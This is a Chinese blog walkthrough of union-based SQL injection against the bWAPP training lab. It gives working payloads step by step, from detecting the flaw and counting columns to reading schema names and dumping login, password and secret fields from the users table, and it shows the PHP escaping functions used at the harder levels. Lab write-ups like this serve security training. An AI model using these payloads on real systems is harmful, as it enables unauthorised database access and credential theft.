bWAPP -- SQL Injection

最新推荐文章于 2023-06-13 20:59:39 发布
最新推荐文章于 2023-06-13 20:59:39 发布
阅读量282 收藏
点赞数
分类专栏: bWAPP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hee_mee/article/details/108686049
版权

bWAPP – SQL Injection (Union 注入)

注入基本流程

  1. 判断存在注入

    1' or 1=1#

    在这里插入图片描述

  2. 判断字段数量

1'  order by 8#`
#(报错)

1'  order by 7#
#(正常回显,存在7个字段)

在这里插入图片描述
在这里插入图片描述

  1. 判断可注入字段位置
1'  union select 1,2,3,4,5,6,7 #

(回显 2 3 5 4 字段可以替换)
在这里插入图片描述

  1. 使用内置函数查看数据库信息

    1'  union select 1,database(),version(),user(),5,6,7  #

在这里插入图片描述

mysql内置函数

  1. 查看表名

    1'  union select 1,database(),version(),user(),table_name,6,7 from information_schema.tables#

    在这里插入图片描述

  2. 获取表字段名

1'  union select 1,database(),version(),table_name,column_name,6,7 from information_schema.columns where table_name="users"#

在这里插入图片描述

  1. 提权相关信息

    1'  union select 1,login,Password,email,secret,6,7 from users#

在这里插入图片描述

  • low

    1'  union select 1,login,Password,email,secret,6,7 from users#

  • mid

    function sqli_check_1($data)
{
   
    return addslashes($data);
    // 语法 addslashes ( string $str ) : string
    // 返回字符串,该字符串为了数据库查询语句等的需要在某些字符前加上了反斜线。
    // 这些字符是单引号(')、双引号(")、反斜线(\)与 NUL(NULL 字符)。
}

    addslashes注入方法

  • high

    function sqli_check_3($link, $data)
{
   
    return mysqli_real_escape_string($link, $data);
    // 面向对象风格
    // mysqli::escape_string ( string $escapestr ) : string
    // mysqli::real_escape_string ( string $escapestr ) : string
    // 过程化风格
    // mysqli_real_escape_string ( mysqli $link , string $escapestr ) : string
    // 此函数用来对字符串中的特殊字符进行转义, 以使得这个字符串是一个合法的 SQL 语句。
    // 传入的字符串会根据当前连接的字符集进行转义,得到一个编码后的合法的 SQL 语句。
}

SQL injection 备忘清单

hee_mee
关注
专栏目录
bwapp闯关(一)SQL injection<low>
weixin_44894271的博客
05-17 472
前言 本文章记录bwapp的SQL injection模块,web安全测试SQL注入 环境准备 docker部署bwapp火狐浏览器安装hackbar插件,登录进入bwapp页面,选择bug类型<SQL injection(GET/Search)>,并设置安全等级为low 按照字段搜索可以看到查询结果信息列表如下 单引号注入检测 根据搜索查询业务我们可以猜想查询用户信息列表的SQL大致为:select XX from database where title = “id”,此时titl
bWAPP-SQLInjectionSQLite
hee_mee的博客
09-26 370
zeronil
bWAPP----SQL Injection (GET/Search)
weixin_30477293的博客
07-23 594
SQL Injection (GET/Search) 输入单引号 报错,在%'附近出错,猜测参数被 '% %'这种形式包裹,没有任何过滤,直接带入了数据库查询 输入order by查询列 union select 确定显示位 然后分别查询用户,数据库名,数据库版本 根据数据库版本知道可以通过information_schema表查询信息,查询table...
bWAPP中SQL注入思路
qq_37019068的博客
10-09 1374
bWAPP中SQL注入思路 SQL Injection (GET/Search) 等级:low 首先看看正常搜索的情况,这里我输入了一个字母b,可以看出来他把标题带有b的电影信息全都给搜出来了 在这里我猜想其构成SQL语句的代码: $sql = "select * from table where Title like '%" . $name . "%'" 接下来为了验证猜想,我输入了一个单引号 返回了一个报错,直接证明了服务器未对单引号进行过滤,意味着我们可以使用单引号进行SQL语句的闭合控制,且也
bWAPP练习--injectionSQL Injection (GET/Search)
weixin_38167363的博客
04-09 1046
SQL注入: SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 LOW: 0x01:分析一下网站的...
bWAPP-XPathInjection
hee_mee的博客
09-26 259
zeronil
【bwapp】SQL Injection(GET/Search)——low级别
最新发布
用博客做做记录的小白
06-13 650
bwapp靶场的sql注入关卡低级难度,采用手工注入和自动化注入两种方式实现sql注入。
DVWA+bWApp+sqli-labs平台 low级别sql注入
qq_42882717的博客
01-07 468
SQL注入漏洞实验手册 实验一:DVWA练习平台low安全级别SQL注入 访问地址:http://127.0.0.1/dvwa,用户名:admin,口令password,成功登录系统。 选择安全级别low,如下图所示。 选择SQL Injection实验,如图所示。 第一步:查找数据输入点,显然User ID是一个数据输入点,输入1-5,会有输入,如图所示,其他数据没有输出。 第二步:SQL注入点测试 首先测试一下是不是数字型的注入点,输入“1 or 1=1”,“1 an.
bWAPP-SQLInjectionPost2
hee_mee的博客
09-20 154
zeronil
bWAPP-SQLInjection2
hee_mee的博客
09-20 145
zeroNil
bwapp sql部分
h0ld1rs的博客
08-13 772
文章目录SQL Injection (GET/Search)SQL Injection (GET/Select)SQL Injection (POST/Search)SQL Injection (POST/Select)SQL Injection (AJAX/JSON/jQuery)SQL Injection (CAPTCHA)SQL Injection (Login Form/Hero)SQL Injection (Login Form/User)SQL Injection (SQLite)SQL Inj
bWApp SQL 注入
Yanug
09-26 1214
1.可以显示的字段 1' union select 1,2,3,4,5,6,7# 2.对mysql用户名主机名,当前数据库的版本信息,当前数据库名称,数据库路径等进行查询和显示。 1' union select 1,user(),version(),database(),5,6,7# 3.当前数据库下面的表名: 1' union select 1,table_name,table_sche...
3.bWAPP SQL注入篇
天上天下,唯我独尊
01-23 3117
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
bWAPP SQL注入篇
angry_program的博客
03-03 7266
步骤 下面简要介绍手工注入(非盲注)的步骤。 1.判断是否存在注入,注入是字符型还是整数型 2.猜解SQL查询语句中的字段数 (order by ) 3.确定显示的字段顺序 4.获取当前数据库 (爆库) 5.获取数据库中的表 (爆表) 6.获取表中的字段名 (爆字段) 7.下载数据 (爆数据) 0x01SQL Injection (GET/Search) ...
Sql Injection
ivalue的博客
07-26 1187
1:sql 注入:SQL Injection 就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 简单来说,就是让服务器获取到你的恶意sql语句,并且执行。     参考 https://blog.csdn.net/chuan442616909/article/details/58653996 https://www.c...
bWAPP-SQLiInsert
hee_mee的博客
09-26 239
zeronil
bwapp靶场笔记 -SQL注入篇
m0_52149675的博客
10-30 1626
​启动靶场。
BWAPP之SQL注入通关
qq_43665434的博客
04-17 2867
1、SQL injection(GET/search) low 输入单引号直接报错,说明有注入点 直接order by二分法得出主查询字段数为7 直接union注入,测出回显点为2,3,4,5 查数据库信息: 测出数据库名为bwapp,用户为root,版本为5.5.53 查询表名: 查询字段名: 查字段值: 没有难度。 medium 尝试多种方法都不行,看了一眼源码: 发现是用addslashes()进行转义的,尝试了下宽字节绕过,也不行。 看了下原来数据库采用的是urf8编码,本来想改成g..
SQL注入-bWAPP靶场-post
m0_62665450的博客
12-31 275
sql注入
SQL Injection检测与防范教程
"SQL Injection 自我檢測" SQL Injection 是一种常见的网络安全漏洞,它发生在应用程序使用用户输入的参数直接构建SQL查询语句时,攻击者可以利用这个弱点插入恶意的SQL代码,以获取未经授权的数据访问、修改或删除...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值